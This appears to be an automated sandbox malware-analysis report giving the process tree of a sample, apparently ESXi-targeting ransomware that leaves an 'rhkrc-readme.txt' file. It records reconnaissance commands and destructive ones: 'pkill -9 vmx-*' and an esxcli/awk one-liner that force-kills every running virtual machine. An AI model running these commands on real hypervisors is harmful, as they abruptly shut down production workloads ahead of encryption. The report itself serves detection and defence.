                  Analysis Process: dash PID: 2890 Parent PID: 2889

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: uname PID: 2890 Parent PID: 2889

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/uname
                  Arguments:uname -a
                  File size:31440 bytes
                  MD5 hash:1078d9dca4e90919f7b2433cae105008

                  Chronological Activities

                  Analysis Process: dash PID: 2891 Parent PID: 2889

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: hostname PID: 2891 Parent PID: 2889

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/hostname
                  Arguments:hostname
                  File size:14800 bytes
                  MD5 hash:79300176c96052498937c20a23cef810

                  Chronological Activities

                  Analysis Process: wQN5w2558L PID: 2894 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:./wQN5w2558L
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown

                  Chronological Activities

                  Analysis Process: dash PID: 2894 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:sh -c "uname -a && echo \" | \" && hostname"
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: dash PID: 2898 Parent PID: 2894

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: uname PID: 2898 Parent PID: 2894

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/uname
                  Arguments:uname -a
                  File size:31440 bytes
                  MD5 hash:1078d9dca4e90919f7b2433cae105008

                  Chronological Activities

                  Analysis Process: dash PID: 2942 Parent PID: 2894

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: hostname PID: 2942 Parent PID: 2894

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/hostname
                  Arguments:hostname
                  File size:14800 bytes
                  MD5 hash:79300176c96052498937c20a23cef810

                  Chronological Activities

                  Analysis Process: wQN5w2558L PID: 2951 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:./wQN5w2558L
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown

                  Chronological Activities

                  Analysis Process: dash PID: 2951 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:sh -c "pkill -9 vmx-*"
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: dash PID: 2952 Parent PID: 2951

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: pkill PID: 2952 Parent PID: 2951

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/usr/bin/pkill
                  Arguments:pkill -9 vmx-*
                  File size:5 bytes
                  MD5 hash:f3b843351a404d4e8d4ce0ed0775fa9c

                  Chronological Activities

                  Analysis Process: wQN5w2558L PID: 2958 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:./wQN5w2558L
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:unknown

                  Chronological Activities

                  Analysis Process: dash PID: 2958 Parent PID: 2888

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:sh -c "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list | awk -F \"\\\"*,\\\"*\" '{system(\"esxcli vm process kill --type=force --world-id=\" $1)}'"
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: dash PID: 2963 Parent PID: 2958

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Analysis Process: dash PID: 2964 Parent PID: 2958

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/bin/dash
                  Arguments:n/a
                  File size:154072 bytes
                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                  Chronological Activities

                  Analysis Process: awk PID: 2964 Parent PID: 2958

                  General

                  Start time:20:57:56
                  Start date:01/07/2021
                  Path:/usr/bin/awk
                  Arguments:awk -F "\"*,\"*" "{system(\"esxcli vm process kill --type=force --world-id=\" $1)}"
                  File size:21 bytes
                  MD5 hash:1bb5d753c2edd5bae269563a5ec6d0fe

                  Chronological Activities

                  Analysis Process: thunar PID: 3040 Parent PID: 3039

                  General

                  Start time:20:58:20
                  Start date:01/07/2021
                  Path:/usr/bin/thunar
                  Arguments:n/a
                  File size:0 bytes
                  MD5 hash:00000000000000000000000000000000

                  Chronological Activities

                  Analysis Process: mousepad PID: 3040 Parent PID: 3039

                  General

                  Start time:20:58:20
                  Start date:01/07/2021
                  Path:/usr/bin/mousepad
                  Arguments:mousepad /home/user/Desktop/rhkrc-readme.txt
                  File size:272536 bytes
                  MD5 hash:aa2bab7862768edb3685f57fdc81d9f2

                  Chronological Activities